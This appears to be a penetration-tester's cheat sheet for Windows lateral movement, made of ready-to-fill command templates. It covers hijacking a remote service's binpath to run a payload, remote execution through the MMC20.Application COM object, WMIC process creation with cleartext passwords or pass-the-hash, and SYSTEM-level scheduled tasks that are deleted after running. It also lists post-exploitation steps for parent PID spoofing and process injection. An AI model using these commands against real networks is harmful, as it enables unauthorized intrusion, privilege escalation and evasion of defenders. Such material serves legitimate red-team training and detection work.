Lateral Movement

Service Manipulation

(VSS is a commonly used service)
sc \\<REMOTE_IP> query <SERVICENAME>
sc \\<REMOTE_IP> qc <SERVICENAME>
sc \\<REMOTE_IP> qfailure <SERVICENAME>
sc \\<REMOTE_IP> config <SERVICENAME> binpath= "<PAYLOAD LOC>"
sc \\<REMOTE_IP> start <SERVICENAME>
sc \\<REMOTE_IP> config <SERVICENAME> binpath= "<ORIGINAL FILE LOC>"
sc \\<REMOTE_IP> qc <SERVICENAME>

COM Object

([activator]::CreateInstance([type]::GetTypeFromProgID(“MMC20.Application”,”<IPToTarget>”))).Document.ActiveView.ExecuteShellCommand(“<CommandToExec>”,$null,$null,”7”)

WMIC

WMIC /NODE:"<IP OR HOSTNAME>" /USER:"<DOMAIN\USERNAME>" /PASSWORD:"<CLEARTEXT_PW>" PROCESS CALL CREATE "<PAYLOAD_FILE_LOC>"
    -or w/ PTH-
WMIC /NODE:"<IP OR HOSTNAME>" PROCESS CALL CREATE "<PAYLOAD_FILE_LOC>"

(Below should be Called after migration with WMIC)
    getprivs
    ppid <random SYSTEM process PID>
    execute c:\windows\system32\upnpcont.exe
    inject <new process ID> x64

SCHTASKS

(IF PRIVILEGED - RU and SC ONLOGON options are available)
schtasks.exe /Create /S <IP or HOSTNAME> /F /RU SYSTEM /SC ONLOGON /TN "<TASKNAME>" /TR "<PAYLOAD_FILEPATH>"
schtasks.exe /run /s <IP or HOSTNAME> /TN <TASKNAME>
schtasks.exe /DELETE /F /TN "<TASKNAME>"